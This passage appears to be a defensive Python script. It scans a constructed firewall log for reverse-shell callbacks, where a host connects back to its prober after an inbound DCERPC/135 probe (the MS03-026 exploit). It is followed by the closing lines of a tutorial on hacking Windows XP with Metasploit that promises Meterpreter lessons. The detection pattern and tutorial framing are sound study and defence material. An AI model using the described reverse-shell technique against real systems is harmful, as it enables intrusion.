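# Constructed sample firewall log: time, action, proto, src, sport, dst, dport.
# 10.0.0.3 is the victim from the tutorial; 10.0.0.6 the attacking host.
# Port 4444 is a constructed callback port, not a value from the page.
SAMPLE_LOG = """\
2012-04-24T10:00:01 ALLOW TCP 10.0.0.6 49152 10.0.0.3 135
2012-04-24T10:00:02 ALLOW TCP 10.0.0.3 1047 10.0.0.6 4444
2012-04-24T10:05:00 ALLOW TCP 10.0.0.9 50233 10.0.0.3 135
2012-04-24T10:20:00 ALLOW TCP 10.0.0.3 1048 10.0.0.9 80
2012-04-24T10:30:00 ALLOW TCP 10.0.0.3 1049 10.0.0.10 443
"""

DCERPC_PORT = 135  # endpoint-mapper port the MS03-026 exploit binds


def parse_line(line):
    """Parse one constructed log line into a dict with typed fields."""
    ts, action, proto, src, sport, dst, dport = line.split()
    return {
        "ts": datetime.fromisoformat(ts),
        "action": action,
        "proto": proto,
        "src": ipaddress.ip_address(src),
        "sport": int(sport),
        "dst": ipaddress.ip_address(dst),
        "dport": int(dport),
    }


def find_reverse_shell_candidates(log_text, window_minutes=5):
    """Return alerts for hosts that, within window_minutes of receiving an
    inbound TCP/135 connection, open an outbound connection back to the
    same peer.  A longer window catches slower operators but raises the
    false-positive rate, which is why it is a parameter."""
    window = timedelta(minutes=window_minutes)
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    events.sort(key=lambda e: e["ts"])

    # probed host -> list of (probe time, probing peer)
    probes = defaultdict(list)
    alerts = []
    for e in events:
        if e["proto"] != "TCP":
            continue
        if e["dport"] == DCERPC_PORT:
            probes[e["dst"]].append((e["ts"], e["src"]))
            continue
        # Outbound connection: does it go back to a recent prober?
        for probe_time, peer in probes.get(e["src"], []):
            if peer == e["dst"] and timedelta(0) <= e["ts"] - probe_time <= window:
                alerts.append({
                    "victim": str(e["src"]),
                    "attacker": str(e["dst"]),
                    "probe_time": probe_time.isoformat(),
                    "callback_port": e["dport"],
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in find_reverse_shell_candidates(SAMPLE_LOG):
        print("possible reverse shell:", alert)
```

With the default five-minute window only the 10.0.0.6 pair is flagged; the 10.0.0.9 probe is followed by a callback fifteen minutes later, so it is reported only when the window is widened, which is the trade-off a detection engineer tunes against the environment's normal RPC traffic.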

In my upcoming lessons, we will look at hacking Linux systems and introduce you to the powerful Meterpreter, Metasploit’s proprietary payload.

Read more: http://null-byte.wonderhowto.com/blog/hack-like-pro-exploit-and-gain-remote-access-pcs-running-windows-xp-0134709/#ixzz1t2aFUR2x

Source: http://www.businessinsider.com/hack-like-a-pro-how-to-exploit-and-gain-remote-access-to-pcs-running-windows-xp-2012-4